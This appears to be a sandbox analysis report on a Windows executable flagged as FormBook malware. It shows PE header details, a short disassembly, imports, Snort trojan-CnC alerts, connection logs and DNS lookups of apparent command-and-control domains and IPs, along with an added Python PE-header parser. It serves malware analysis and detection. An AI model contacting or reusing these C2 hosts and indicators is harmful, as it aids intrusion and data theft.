                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*.....
                                                                                                                      Icon Hash:517959587979b110
                                                                                                                      Entrypoint:0x403640
                                                                                                                      Entrypoint Section:.text
                                                                                                                      Digitally signed:false
                                                                                                                      Imagebase:0x400000
                                                                                                                      Subsystem:windows gui
                                                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                      Time Stamp:0x614F9B1F [Sat Sep 25 21:56:47 2021 UTC]
                                                                                                                      TLS Callbacks:
                                                                                                                      CLR (.Net) Version:
                                                                                                                      OS Version Major:4
                                                                                                                      OS Version Minor:0
                                                                                                                      File Version Major:4
                                                                                                                      File Version Minor:0
                                                                                                                      Subsystem Version Major:4
                                                                                                                      Subsystem Version Minor:0
                                                                                                                      Import Hash:61259b55b8912888e90f516ca08dc514
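The static fields listed above (entry point, time stamp, image and DLL characteristics, subsystem, data directories) all come straight out of the PE32 header and can be read back with a few struct unpacks. The following is an added example, not part of the Joe Sandbox report: it builds a constructed 32-bit header that carries the values printed on this page (these are not the real sample's bytes; section table and everything after the optional header are omitted) and parses it back. It also makes explicit the check a reviewer would want here: DYNAMIC_BASE is set, but the file also has RELOCS_STRIPPED and, as the data directory table below shows, an empty BASERELOC entry, so the loader cannot rebase the image and it will map at its preferred base 0x400000 regardless of the ASLR flag. The flag names and bit values are the winnt.h ones; the Import Hash is not recomputed (that needs the import table, which pefile's `get_imphash()` handles).

```python
import datetime
import struct

# IMAGE_FILE_HEADER.Characteristics bits (winnt.h), named as the report prints them.
FILE_CHARACTERISTICS = {
    0x0001: "RELOCS_STRIPPED",
    0x0002: "EXECUTABLE_IMAGE",
    0x0004: "LINE_NUMS_STRIPPED",
    0x0008: "LOCAL_SYMS_STRIPPED",
    0x0020: "LARGE_ADDRESS_AWARE",
    0x0100: "32BIT_MACHINE",
    0x2000: "DLL",
}

# IMAGE_OPTIONAL_HEADER.DllCharacteristics bits (winnt.h).
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA",
    0x0040: "DYNAMIC_BASE",
    0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT",
    0x0400: "NO_SEH",
    0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}

# Data directory slots in header order (IMAGE_DIRECTORY_ENTRY_*).
DATA_DIRECTORIES = [
    "EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY", "BASERELOC",
    "DEBUG", "COPYRIGHT", "GLOBALPTR", "TLS", "LOAD_CONFIG", "BOUND_IMPORT",
    "IAT", "DELAY_IMPORT", "COM_DESCRIPTOR", "RESERVED",
]


def decode_flags(value: int, table: dict) -> list:
    """Names of the set bits, lowest bit first (bits not in the table are ignored)."""
    return [name for bit, name in sorted(table.items()) if value & bit]


def pe_timestamp_utc(ts: int) -> str:
    """TimeDateStamp is seconds since the Unix epoch; render it the way the report does."""
    return datetime.datetime.fromtimestamp(ts, datetime.timezone.utc).strftime("%a %b %d %H:%M:%S %Y UTC")


def parse_pe32(data: bytes) -> dict:
    """Pull the fields the report lists out of a PE32 (32-bit) image header."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    fh = e_lfanew + 4                                   # IMAGE_FILE_HEADER
    machine, _nsec, timestamp, _, _, _opt, characteristics = struct.unpack_from("<HHIIIHH", data, fh)
    oh = fh + 20                                        # IMAGE_OPTIONAL_HEADER32
    if struct.unpack_from("<H", data, oh)[0] != 0x10B:
        raise ValueError("only PE32 optional headers are handled here")
    entry_rva = struct.unpack_from("<I", data, oh + 16)[0]
    image_base = struct.unpack_from("<I", data, oh + 28)[0]
    subsystem, dll_chars = struct.unpack_from("<HH", data, oh + 68)
    n_dirs = struct.unpack_from("<I", data, oh + 92)[0]
    dirs = {}
    for i, name in enumerate(DATA_DIRECTORIES[:n_dirs]):
        dirs[name] = struct.unpack_from("<II", data, oh + 96 + 8 * i)   # (VirtualAddress, Size)
    return {
        "machine": machine,
        "entrypoint": image_base + entry_rva,
        "imagebase": image_base,
        "timestamp": f"0x{timestamp:08X} [{pe_timestamp_utc(timestamp)}]",
        "subsystem": {2: "windows gui", 3: "windows cui"}.get(subsystem, str(subsystem)),
        "file_characteristics": decode_flags(characteristics, FILE_CHARACTERISTICS),
        "dll_characteristics": decode_flags(dll_chars, DLL_CHARACTERISTICS),
        "data_directories": dirs,
    }


def aslr_effective(info: dict) -> bool:
    """DYNAMIC_BASE only matters if the loader can rebase the image, which needs relocations."""
    wants_aslr = "DYNAMIC_BASE" in info["dll_characteristics"]
    relocs_stripped = "RELOCS_STRIPPED" in info["file_characteristics"]
    has_reloc_dir = info["data_directories"].get("BASERELOC", (0, 0))[1] > 0
    return wants_aslr and not relocs_stripped and has_reloc_dir


def build_sample_header() -> bytes:
    """Constructed header carrying the values printed above; NOT the real sample's bytes."""
    buf = bytearray(0x80 + 4 + 20 + 224)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x80)             # e_lfanew
    buf[0x80:0x84] = b"PE\0\0"
    # i386, 4 sections, TimeDateStamp, no symbols, 224-byte optional header, Characteristics 0x010F
    struct.pack_into("<HHIIIHH", buf, 0x84, 0x014C, 4, 0x614F9B1F, 0, 0, 224, 0x010F)
    oh = 0x84 + 20
    struct.pack_into("<H", buf, oh, 0x10B)              # PE32 magic
    struct.pack_into("<I", buf, oh + 16, 0x3640)        # AddressOfEntryPoint (RVA)
    struct.pack_into("<I", buf, oh + 28, 0x400000)      # ImageBase
    struct.pack_into("<HH", buf, oh + 68, 2, 0x8540)    # GUI; DYNAMIC_BASE|NX_COMPAT|NO_SEH|TERMINAL_SERVER_AWARE
    struct.pack_into("<I", buf, oh + 92, 16)            # NumberOfRvaAndSizes
    struct.pack_into("<II", buf, oh + 96 + 8 * 1, 0x8504, 0xA0)      # IMPORT
    struct.pack_into("<II", buf, oh + 96 + 8 * 2, 0x3B000, 0x4510)   # RESOURCE; BASERELOC stays 0/0
    return bytes(buf)


if __name__ == "__main__":
    info = parse_pe32(build_sample_header())
    for key, value in info.items():
        print(f"{key}: {value}")
    print("ASLR effective:", aslr_effective(info))
```

Running it against a real file is a matter of `parse_pe32(open(path, "rb").read())`. The time stamp is attacker-controlled and is only worth noting as a pivot (the same build stamp across samples often means the same builder), not as evidence of when the file was made.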
                                                                                                                      Instruction
                                                                                                                      push ebp
                                                                                                                      mov ebp, esp
                                                                                                                      sub esp, 000003F4h
                                                                                                                      push ebx
                                                                                                                      push esi
                                                                                                                      push edi
                                                                                                                      push 00000020h
                                                                                                                      pop edi
                                                                                                                      xor ebx, ebx
                                                                                                                      push 00008001h
                                                                                                                      mov dword ptr [ebp-14h], ebx
                                                                                                                      mov dword ptr [ebp-04h], 0040A230h
                                                                                                                      mov dword ptr [ebp-10h], ebx
                                                                                                                      call dword ptr [004080C8h]
                                                                                                                      mov esi, dword ptr [004080CCh]
                                                                                                                      lea eax, dword ptr [ebp-00000140h]
                                                                                                                      push eax
                                                                                                                      mov dword ptr [ebp-0000012Ch], ebx
                                                                                                                      mov dword ptr [ebp-2Ch], ebx
                                                                                                                      mov dword ptr [ebp-28h], ebx
                                                                                                                      mov dword ptr [ebp-00000140h], 0000011Ch
                                                                                                                      call esi
                                                                                                                      test eax, eax
                                                                                                                      jne 00007FB070C04CCAh
                                                                                                                      lea eax, dword ptr [ebp-00000140h]
                                                                                                                      mov dword ptr [ebp-00000140h], 00000114h
                                                                                                                      push eax
                                                                                                                      call esi
                                                                                                                      mov ax, word ptr [ebp-0000012Ch]
                                                                                                                      mov ecx, dword ptr [ebp-00000112h]
                                                                                                                      sub ax, 00000053h
                                                                                                                      add ecx, FFFFFFD0h
                                                                                                                      neg ax
                                                                                                                      sbb eax, eax
                                                                                                                      mov byte ptr [ebp-26h], 00000004h
not eax
and eax, ecx
mov word ptr [ebp-2Ch], ax
cmp dword ptr [ebp-0000013Ch], 0Ah
jnc 00007FB070C04C9Ah
and word ptr [ebp-00000132h], 0000h
mov eax, dword ptr [ebp-00000134h]
movzx ecx, byte ptr [ebp-00000138h]
mov dword ptr [0042A318h], eax
xor eax, eax
mov ah, byte ptr [ebp-0000013Ch]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [ebp-2Ch]
movzx ecx, cx
shl eax, 10h
or eax, ecx
Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804
Data directories:
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x8504           0xa0          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x3b000          0x4510        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x8000           0x2b0         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Sections:
Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity     File Type  Entropy             Characteristics
.text   0x1000           0x6676        0x6800    False     0.6568134014423077  data       6.4174599871908855  IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata  0x8000           0x139a        0x1400    False     0.4498046875        data       5.141066817170598   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0xa000           0x20378       0x600     False     0.509765625         data       4.110582127654237   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata  0x2b000          0x10000       0x0       False     0                   empty      0.0                 IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc   0x3b000          0x4510        0x4600    False     0.4218191964285714  data       5.130936129573036   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Resources:
Name           RVA      Size    Type                                                                                        Language  Country
RT_ICON        0x3b238  0x25a8  Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m  English   United States
RT_ICON        0x3d7e0  0x10a8  Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m  English   United States
RT_ICON        0x3e888  0x468   Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 3779 x 3779 px/m  English   United States
RT_DIALOG      0x3ecf0  0x100   data                                                                                        English   United States
RT_DIALOG      0x3edf0  0x11c   data                                                                                        English   United States
RT_DIALOG      0x3ef10  0x60    data                                                                                        English   United States
RT_GROUP_ICON  0x3ef70  0x30    data                                                                                        English   United States
RT_VERSION     0x3efa0  0x22c   data                                                                                        English   United States
RT_MANIFEST    0x3f1d0  0x33e   XML 1.0 document, ASCII text, with very long lines (830), with no line terminators           English   United States
Imports (DLL: imported functions):
ADVAPI32.dll: RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
SHELL32.dll: SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
ole32.dll: OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
COMCTL32.dll: ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll: GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
GDI32.dll: SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll: GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
Language of compilation system  Country where language is spoken
English                         United States
Snort IDS alerts:
Timestamp                 Protocol  SID      Message                                          Source Port  Dest Port  Source IP    Dest IP
03/20/23-09:09:09.878629  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)             49705        80         192.168.2.3  5.181.216.141
03/20/23-09:09:09.878629  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)             49705        80         192.168.2.3  5.181.216.141
03/20/23-09:09:09.878629  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)             49705        80         192.168.2.3  5.181.216.141
03/20/23-09:09:32.876293  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)             49711        80         192.168.2.3  185.151.30.181
03/20/23-09:09:32.876293  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)             49711        80         192.168.2.3  185.151.30.181
03/20/23-09:09:32.876293  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)             49711        80         192.168.2.3  185.151.30.181
03/20/23-09:09:48.362224  UDP       2023883  ET DNS Query to a *.top domain - Likely Hostile  51139        53         192.168.2.3  8.8.8.8
03/20/23-09:09:54.051496  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)             49717        80         192.168.2.3  192.64.116.162
03/20/23-09:09:54.051496  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)             49717        80         192.168.2.3  192.64.116.162
03/20/23-09:09:54.051496  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)             49717        80         192.168.2.3  192.64.116.162
                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Mar 20, 2023 09:08:23.239229918 CET4969880192.168.2.3199.59.243.223
                                                                                                                      Mar 20, 2023 09:08:23.258771896 CET8049698199.59.243.223192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:23.258922100 CET4969880192.168.2.3199.59.243.223
                                                                                                                      Mar 20, 2023 09:08:23.259864092 CET4969880192.168.2.3199.59.243.223
                                                                                                                      Mar 20, 2023 09:08:23.280504942 CET8049698199.59.243.223192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:23.462835073 CET8049698199.59.243.223192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:23.466599941 CET8049698199.59.243.223192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:23.466635942 CET8049698199.59.243.223192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:23.466769934 CET4969880192.168.2.3199.59.243.223
                                                                                                                      Mar 20, 2023 09:08:23.466814995 CET4969880192.168.2.3199.59.243.223
                                                                                                                      Mar 20, 2023 09:08:23.466965914 CET4969880192.168.2.3199.59.243.223
                                                                                                                      Mar 20, 2023 09:08:23.476100922 CET8049698199.59.243.223192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:23.476188898 CET4969880192.168.2.3199.59.243.223
                                                                                                                      Mar 20, 2023 09:08:23.486416101 CET8049698199.59.243.223192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:33.718719006 CET4970080192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:08:33.860883951 CET8049700198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:33.861018896 CET4970080192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:08:33.861186028 CET4970080192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:08:34.004131079 CET8049700198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:34.004220963 CET8049700198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:34.004365921 CET4970080192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:08:35.370201111 CET4970080192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:08:36.387404919 CET4970180192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:08:36.529535055 CET8049701198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:36.529732943 CET4970180192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:08:36.530070066 CET4970180192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:08:36.673634052 CET8049701198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:36.673666954 CET8049701198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:36.678245068 CET8049701198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:36.678307056 CET8049701198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:36.678327084 CET8049701198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:36.678345919 CET8049701198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:36.678364992 CET8049701198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:36.678384066 CET8049701198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:36.678401947 CET8049701198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:36.678421021 CET8049701198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:36.678453922 CET8049701198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:36.678473949 CET8049701198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:36.678502083 CET4970180192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:08:36.678550959 CET4970180192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:08:38.041094065 CET4970180192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:08:39.057307005 CET4970280192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:08:39.198124886 CET8049702198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:39.198402882 CET4970280192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:08:39.198573112 CET4970280192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:08:39.338808060 CET8049702198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:39.338846922 CET8049702198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:39.338994026 CET4970280192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:08:39.339560032 CET4970280192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:08:39.479263067 CET8049702198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:52.197664976 CET4970380192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:08:55.183217049 CET4970380192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:08:55.350596905 CET80497035.181.216.141192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:55.350929976 CET4970380192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:08:55.351131916 CET4970380192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:08:55.518073082 CET80497035.181.216.141192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:55.518115997 CET80497035.181.216.141192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:55.518137932 CET80497035.181.216.141192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:55.518275976 CET4970380192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:08:55.518762112 CET80497035.181.216.141192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:55.518836021 CET4970380192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:08:56.855484962 CET4970380192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:08:57.871778011 CET4970480192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:08:58.037409067 CET80497045.181.216.141192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:58.037661076 CET4970480192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:08:58.038130045 CET4970480192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:08:58.202923059 CET80497045.181.216.141192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:58.202984095 CET80497045.181.216.141192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:58.203006983 CET80497045.181.216.141192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:58.203119993 CET4970480192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:08:58.203399897 CET80497045.181.216.141192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:58.203422070 CET80497045.181.216.141192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:58.203469038 CET4970480192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:08:58.367841005 CET80497045.181.216.141192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:58.367882967 CET80497045.181.216.141192.168.2.3
                                                                                                                      Mar 20, 2023 09:09:00.559386015 CET4970580192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:09:03.558839083 CET4970580192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:09:09.716959000 CET4970580192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:09:09.878328085 CET80497055.181.216.141192.168.2.3
                                                                                                                      Mar 20, 2023 09:09:09.878494024 CET4970580192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:09:09.878628969 CET4970580192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:09:10.038577080 CET80497055.181.216.141192.168.2.3
                                                                                                                      Mar 20, 2023 09:09:10.038641930 CET80497055.181.216.141192.168.2.3
                                                                                                                      Mar 20, 2023 09:09:10.038702965 CET80497055.181.216.141192.168.2.3
                                                                                                                      Mar 20, 2023 09:09:10.038727999 CET80497055.181.216.141192.168.2.3
                                                                                                                      Mar 20, 2023 09:09:10.038892031 CET4970580192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:09:10.038979053 CET4970580192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:09:10.039194107 CET4970580192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:09:10.199062109 CET80497055.181.216.141192.168.2.3
                                                                                                                      Mar 20, 2023 09:09:15.096410036 CET4970680192.168.2.3213.171.195.105
                                                                                                                      Mar 20, 2023 09:09:15.129733086 CET8049706213.171.195.105192.168.2.3
                                                                                                                      Mar 20, 2023 09:09:15.129988909 CET4970680192.168.2.3213.171.195.105
                                                                                                                      Mar 20, 2023 09:09:15.130350113 CET4970680192.168.2.3213.171.195.105
                                                                                                                      Mar 20, 2023 09:09:15.164252996 CET8049706213.171.195.105192.168.2.3
                                                                                                                      Mar 20, 2023 09:09:15.164403915 CET8049706213.171.195.105192.168.2.3
                                                                                                                      Mar 20, 2023 09:09:15.164463043 CET8049706213.171.195.105192.168.2.3
                                                                                                                      Mar 20, 2023 09:09:15.164660931 CET4970680192.168.2.3213.171.195.105
                                                                                                                      Mar 20, 2023 09:09:16.639620066 CET4970680192.168.2.3213.171.195.105
                                                                                                                      Mar 20, 2023 09:09:17.654774904 CET4970780192.168.2.3213.171.195.105
                                                                                                                      Mar 20, 2023 09:09:17.688360929 CET8049707213.171.195.105192.168.2.3
DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 20, 2023 09:08:18.059130907 CET | 192.168.2.3 | 8.8.8.8 | 0x7c1d | Standard query (0) | www.themssterofssuepnse.rest | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:08:23.120605946 CET | 192.168.2.3 | 8.8.8.8 | 0xa01d | Standard query (0) | www.hudsonandbailey.uk | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:08:33.538893938 CET | 192.168.2.3 | 8.8.8.8 | 0xd7a5 | Standard query (0) | www.virginhairweave.co.uk | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:08:44.356928110 CET | 192.168.2.3 | 8.8.8.8 | 0x34e3 | Standard query (0) | www.brennmansoluciones.com | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:08:45.622361898 CET | 192.168.2.3 | 8.8.8.8 | 0x388c | Standard query (0) | www.brennmansoluciones.com | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:08:46.827991962 CET | 192.168.2.3 | 8.8.8.8 | 0xb63f | Standard query (0) | www.brennmansoluciones.com | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:08:52.008558989 CET | 192.168.2.3 | 8.8.8.8 | 0x96dc | Standard query (0) | www.dirdikyepedia.com | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:09:15.063662052 CET | 192.168.2.3 | 8.8.8.8 | 0xc039 | Standard query (0) | www.g2fm.co.uk | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:09:27.620827913 CET | 192.168.2.3 | 8.8.8.8 | 0x468d | Standard query (0) | www.mynichemarket.co.uk | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:09:38.002252102 CET | 192.168.2.3 | 8.8.8.8 | 0x2560 | Standard query (0) | www.landlotto.ru | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:09:48.362224102 CET | 192.168.2.3 | 8.8.8.8 | 0xc976 | Standard query (0) | www.gorwly.top | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:10:00.005140066 CET | 192.168.2.3 | 8.8.8.8 | 0x627d | Standard query (0) | www.ketoibabal.cyou | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:10:01.176269054 CET | 192.168.2.3 | 8.8.8.8 | 0xbe46 | Standard query (0) | www.ketoibabal.cyou | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:10:02.394485950 CET | 192.168.2.3 | 8.8.8.8 | 0x1805 | Standard query (0) | www.ketoibabal.cyou | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:10:07.544554949 CET | 192.168.2.3 | 8.8.8.8 | 0x1492 | Standard query (0) | www.thelastwill.net | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:10:08.603447914 CET | 192.168.2.3 | 8.8.8.8 | 0x442d | Standard query (0) | www.thelastwill.net | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:10:09.648912907 CET | 192.168.2.3 | 8.8.8.8 | 0x46d1 | Standard query (0) | www.thelastwill.net | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:10:14.745964050 CET | 192.168.2.3 | 8.8.8.8 | 0x87cc | Standard query (0) | www.ty23vip.com | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:10:25.792670965 CET | 192.168.2.3 | 8.8.8.8 | 0xc5ab | Standard query (0) | www.allison2patrick.online | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:10:36.036226034 CET | 192.168.2.3 | 8.8.8.8 | 0x5df2 | Standard query (0) | www.glb-mobility.com | A (IP address) | IN (0x0001) | false
